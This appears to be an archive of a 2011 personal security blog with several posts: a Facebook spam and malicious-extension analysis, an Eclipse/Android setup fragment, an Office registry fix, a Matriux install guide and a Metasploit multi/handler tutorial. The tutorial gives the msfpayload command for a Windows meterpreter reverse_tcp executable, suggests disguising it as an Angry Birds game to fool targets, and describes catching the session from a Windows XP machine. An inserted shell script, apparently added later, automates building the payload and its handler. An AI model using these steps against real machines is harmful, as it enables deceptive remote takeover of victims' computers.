Spam on Facebook is nothing new, but this particular campaign was put together quite cleverly, and analysing it was interesting because it shows how far spammers will go. Today one of my friends on Facebook was annoyed by a spam post that kept appearing on all of his friends' walls; it looked like this:

I was asked what to do. At first glance it looked like every other spam, so I suggested the usual measures: remove any doubtful Facebook applications and clear the browser data. But the posting continued even after that, so I decided to look into it.

First the URL: the spam appeared to originate from http://nwuuwiwiwiw.blogspot.com/. The blog looked like this:

Interesting! The page says the video needs a DivX plug-in, yet asks you to install a "YouTube Premium" plugin (what a "premium" for YouTube would be, I wonder!).

So I decided to look at the page source; here is what it contained:

So this installs a browser add-on or extension depending on the browser. The else branch made sense: it has to do something when the browser is neither Firefox nor Chrome; we will look at the PHP behind that else branch later. I downloaded the Firefox "YouTube" add-on and extracted it; the file to look into was youtube.js:

Remember the else branch from the first code snippet that I promised to discuss later? It contained a link to http://mieneeueueu.co.cc/yt/video.php. The file extra.js also contains this URL and redirects the user to it after the add-on/extension is installed. Navigating to that link, I found:

This page actually contained the embedded video, so the user finally gets to see it and is presumably happy (the comments at the bottom are not real, though; they are an image. Stupid and smart.) ;)

While the user watches the video to the end, the script that steals the browser cookies gets enough time to spread the spam to all of the friends' walls.

Analysing the code further,

The code here assigns random values to some variables used in the post so that the post is not identical on every wall. Using all of the variables from post_form_id to p3, it can produce a large number of distinct messages (mathematical combinations put to use, smart eh?).

Looking into the main part of the code, where the message is generated and sent for posting,

From the snippet above it is clear that it uses the grabbed cookies to post the spam on other people's walls. The script also contained an unfinished part that was left unused (maybe the spammer was happy with this for now, or is buying time from the user to finish the spam properly) with a link to http://rihannaxgirlzke.blogspot.com/, which looked like:

Looking at its source, however, it did not contain any script; it was a static page whose content was actually an image file.

Conclusion:

Social networking sites often fall prey to such scams and spam, but much of it happens with the user's own consent, out of ignorance. Most of the time a closer look at the post is enough to tell whether it is a genuine video from a valid link. In this case:

1. Look at the link the post originated from: for a genuine video it is clearly youtube.com (underlined in black), whereas this spam came from the blogspot address above.

2. The thumbnail preview for videos has also changed: the play button is now transparent black, while the spam we discussed had a blue play button (underlined in red).

3. Always install extensions from known sources:

a. Chrome: the Chrome Web Store

b. Firefox: Mozilla Add-ons

4. Use add-ons such as NoScript and No-Ads to block such scripts.

5. Stay away from scams and spam that promise a gift or money.

Accept the license terms and finish the ADT installation. It may show a few warnings about plugin verification; accept them and restart Eclipse after the installation.

After the restart you will see a popup like this:

Select the path where the Android SDK was installed, or install a new SDK if you have not done so already. Finish the installation and you should see the highlighted items in the Eclipse toolbar.

That means you have successfully set up the Android SDK in Eclipse.

Now click on Android SDK Manager, select the Android platforms you want to develop for, and install them as shown below.

Thursday, September 29, 2011

Recently I was trying to install Office 2010 as an upgrade over an existing Office 2007. It took too long, so I stopped the installation, intending to uninstall 2007 manually and then do a fresh install of 2010. However, when I tried to uninstall 2007 there was some issue and I was unable to remove it.

I tried deleting the Office 2007 files manually and removing all of its temp and reference files on the disk. That worked, but when I tried to install 2010 I got the following error:

setup cannot open the registry key Unknown/Component/xxxxxxxxxxxx make sure you have administrative rights..

That was annoying, as I realised the registry permissions were screwed up. A little Google search told me I needed SubInACL [ Download ]. However, that meant fixing all the registry keys, so I used a neat script from AddictiveTips by Ghaus Iftikar Nakodari. Here is what you do:

Copy SubInACL.exe from the place it was installed to C:\Windows\system32

Thursday, August 18, 2011

I will guide you through a series of steps to install Matriux on your hard disk or in VirtualBox.

If you are installing on a hard disk drive, scroll down to the instructions from "Step 6".

Follow this series of screenshots to install Matriux Krypton until I create a more thorough tutorial and a video.

Step1 :

Start VirtualBox, click "New", and select Operating System "Linux" and Version "Debian".

Step 2:

Allocate RAM for the installation; anything more than 256 MB is good enough.

Step 3:

Create a virtual hard disk for the installation; usually more than 6 GB is fine (8 GB recommended). Select any type of virtual hard disk.

Step 4:

Allot the hard disk size and the directory you want, or go with the defaults.

Step 5:

After these steps, start the virtual machine. Since it is the first boot, it will prompt you to mount a disk image (ISO image). Browse to the ISO image on your hard disk (the place where you downloaded Matriux Krypton).

Select the ISO on your hard disk or the DVD drive as the installation media.

This will start Matriux in Live mode.

Enter the password "toor" and log in.

Step 6:

Open a terminal and type gparted to start the GParted interface.

If it is a new, unallocated disk, use Device > Create Partition Table (otherwise, if the disk already has a partition table, skip the next step and go straight to formatting).

Step 7:

Select the disk space where you want to install Matriux and click New.

Click "Add".

Click the tick mark highlighted in the screenshot below, confirm with "Apply", and close GParted.

Step 8:

Now open a terminal and mount the partition we just created. Type the following in the terminal (replace /dev/sda1 with the partition you actually created in GParted if its name is different):

mkdir /mnt/matriux

mount /dev/sda1 /mnt/matriux

Step 9:

Close the terminal and start the Matriux Disk Installer from the desktop. It should be easy from here: a simple seven-step process with a few entries such as username, passwords and locale, and that's it!

Step a:

Select the installation partition

Step b:

Choose whether to install GRUB

Choose the disk for GRUB

Step c:

Type the usernames and passwords for root and the user

Step d:

Select the locale you want (select en_US if you are not sure and prefer English)

Step e:

Confirm your settings and profile

The installer then spends a few minutes installing Matriux.

Step f:

Congratulations, you have now installed Matriux. Reboot your system to boot into your new installation.

Saturday, July 23, 2011

This is a brief tutorial on the Metasploit multi/handler exploit module with a meterpreter reverse_tcp payload.

Metasploit is the single most powerful open source tool available today for penetration testers. It can be used for developing and executing exploit code against a remote target machine, and it is a very famous and widely used penetration tester's choice.

The Metasploit Framework has four interfaces to work with:

1. MSF command line (msfcli)

2. MSF console (msfconsole)

3. MSF GUI (msfgui)

4. Armitage (recently included with the framework)

There was also a web-based version, which later became obsolete because it was buggy. msfconsole is the most widely used and most powerful mode of the framework.

Metasploit in Matriux:

This tutorial uses Matriux as the operating system, which can be found here: http://www.matriux.com/

It can also be started from the terminal by typing msfconsole or msfgui, depending on which you prefer.

This is how the graphical interface typically looks:

However, we will proceed with msfconsole, which I suggest is the most extensive way of using the framework.


Start the Metasploit Framework by typing "msfconsole" in the terminal; also run "msfupdate" to update the framework.

To work with multi/handler we first have to generate an executable bound to the meterpreter reverse_tcp payload, which we will share with the target Windows machines. Open a new terminal and type (with no spaces around the = signs, or the option is not applied):

msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=1080 X > /home/matriux/angrybird.exe

where LHOST is the IP address of our local machine and LPORT is the port to listen on.

This generates an angrybird.exe file in the home directory, as shown here. This file is shared with the target machines we intend to exploit (you can fool your target by changing the icon of the generated exe so it looks like an Angry Birds game file ;))

After sharing the file with the target, we wait for it to be executed. Meanwhile we start the reverse_tcp handler on our system. In msfconsole, select the module with "use multi/handler" and set the payload with "set payload windows/meterpreter/reverse_tcp".

Now set LHOST and LPORT with "set LHOST <local IP>" and "set LPORT <port to listen on>". These must match the values used when the exe payload was generated earlier, otherwise the connection from the target never reaches our listener; you can check the required options with "show options".

We are now ready to exploit our target machines (here I set up a Windows XP machine). Start the listener by typing "exploit" and wait for the target to run angrybird.exe; as soon as the victim runs the executable, a meterpreter session is opened over the reverse TCP connection.
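As an added example (my own script, not from the original article or from the Matriux project), the procedure above rolled into one shell script. The point it makes is the one the article warns about: the handler has to be set up with exactly the LHOST and LPORT that went into the executable, so here a single pair of variables feeds both the msfpayload command and a msfconsole resource script for multi/handler, and the values are checked before either tool sees them. The IP address, file names and the validation helpers are my assumptions; msfpayload is the 2011-era tool the article uses (later releases replaced it with msfvenom), and the script only invokes it when it is actually installed.

```shell
#!/bin/sh
# Added example, not from the original article: generate the reverse_tcp
# executable and the matching multi/handler resource script from one set
# of values, so the listener cannot drift from the payload.

LHOST="${LHOST:-192.168.1.10}"      # address the target can reach us on (assumed)
LPORT="${LPORT:-1080}"              # port the article listens on
PAYLOAD="windows/meterpreter/reverse_tcp"
OUT_EXE="${OUT_EXE:-$HOME/angrybird.exe}"
RC_FILE="${RC_FILE:-$HOME/handler.rc}"

# A port is 1..65535 and nothing but digits. A typo such as "LPORT = 1080"
# (spaces) would otherwise be silently ignored by msfpayload.
valid_port() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Dotted-quad IPv4 with every octet in 0..255.
valid_ipv4() {
    printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    for o in $(printf '%s\n' "$1" | tr '.' ' '); do
        [ "$o" -le 255 ] || return 1
    done
}

# The msfconsole resource script: same module, payload and options the
# article sets by hand. ExitOnSession=false and "exploit -j -z" keep the
# handler listening in the background for more than one victim.
handler_rc() {
    cat <<EOF
use exploit/multi/handler
set PAYLOAD $PAYLOAD
set LHOST $1
set LPORT $2
set ExitOnSession false
exploit -j -z
EOF
}

# The exact msfpayload invocation (2011-era syntax used in the article).
payload_cmd() {
    printf 'msfpayload %s LHOST=%s LPORT=%s X > %s\n' "$PAYLOAD" "$1" "$2" "$3"
}

build_all() {
    valid_ipv4 "$LHOST" || { echo "bad LHOST: $LHOST" >&2; return 1; }
    valid_port "$LPORT" || { echo "bad LPORT: $LPORT" >&2; return 1; }
    handler_rc "$LHOST" "$LPORT" > "$RC_FILE"
    if command -v msfpayload >/dev/null 2>&1; then
        msfpayload "$PAYLOAD" LHOST="$LHOST" LPORT="$LPORT" X > "$OUT_EXE"
    else
        echo "msfpayload not installed; would run: $(payload_cmd "$LHOST" "$LPORT" "$OUT_EXE")" >&2
    fi
    echo "handler written to $RC_FILE; start it with: msfconsole -r $RC_FILE"
}

# Only build when run directly with RUN_BUILD=1, so the functions can be
# sourced and inspected without touching the filesystem.
if [ "${RUN_BUILD:-0}" = "1" ]; then
    build_all
fi
```

Run it as RUN_BUILD=1 LHOST=<your IP> sh build.sh and then msfconsole -r ~/handler.rc; "show options" in the console will list the same LHOST and LPORT that were baked into angrybird.exe, because both came from the same two variables.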

BINGO, we are done! We successfully exploited a Windows XP machine with multi/handler.

And have you noticed? We just showed you a preview of Matriux's upcoming version ;) Ch33rs!!!

This article was earlier published by me in CHmag in the July 2011 Issue - http://chmag.in/


About Me

Prajwal Panchmahalkar was born in Hyderabad, a city in AP, on the eleventh of December, nineteen hundred and eighty-nine A.D., a Sagittarian. From that day onwards, Prajwal has been in the late beta version ever since. Now he is a fully grown dude aged 20 years and pursuing a useless "BTech" from TKR Engg College.

During his pursuit of knowledge, Prajwal spent his school days at various schools around AP, from Vijay High in Armoor to St. Claret at Medchal, Hyderabad. After completing his useless schooling at Siddhartha School, he joined Krishna Murthy's V Study Circle to be trained for IIT, and his current progression with IT includes MCITP (Microsoft Certified IT Professional) and SCJP (Sun Certified Java Programmer), and he is looking ahead to become a SCJD. Prajwal Panchmahalkar loves fooling around with computers and probably this is what got him into the IT field.

Prajwal now feels proud to be a network security guy playing around with boxes and feels proud to moderate the Hyderabad null chapter. He has attended various conferences like ISD, c0c0n and SunTech Days. Prajwal has also delivered awareness seminars on network security and ethical hacking at various colleges (GRIET, TKR) and various other events. Prajwal finds his interest in the Matriux Project and takes pleasure in advancing it.

He is now a certified CEH v6, along with his past achievements AFCEH and ACE. Prajwal finds pleasure in writing articles for magazines; recently his article *METASPLOIT FRAMEWORK* was published in "DeveloperIQ" magazine, and he is also looking forward to making it into CHmag lately.

Although Prajwal has not lately been into social life, he finds interest in it recently. He has made up a few vacancies for the standing "girlfriend" post, so if anyone finds her profile matching the said posting she can approach him either through mail or contact him directly....!!

Prajwal likes to listen to music and his tastes range from Indian classical music to metal and rock. Prajwal lives on Enrique, Green Day, Rasmus, POD, Atif and JAL songs. Prajwal enjoys dancing, but he has no coordination in his body movements, his steps are not graceful and he has two left feet. Facebook, Twitter and now Google+, gaming, cricket and biking are pastimes that Prajwal indulges in. Prajwal also likes to gaze at stars and many a night is spent on the rooftop looking at the sky and wishing to become an astronaut. Prajwal himself doesn't know what he searches for in the stars. Fortune says Prajwal is destined to be a doctor, but Prajwal doesn't find it easy to do with his BTech in hand. Prajwal is a dreamer; although his philosophy on life is limited and he is still exploring his boundaries, his dreams have gotten him into trouble many times. Prajwal is a citizen of India, that is Bharat, and loves the country, but has radical views on politics and politicians. Prajwal loves to travel, exploring unknown places, especially in the hills. Prajwal hates pollution and heat. Prajwal is nocturnal; he is attracted to the night because it is mysterious ... ( to be contd. ) edited: 04/02/2011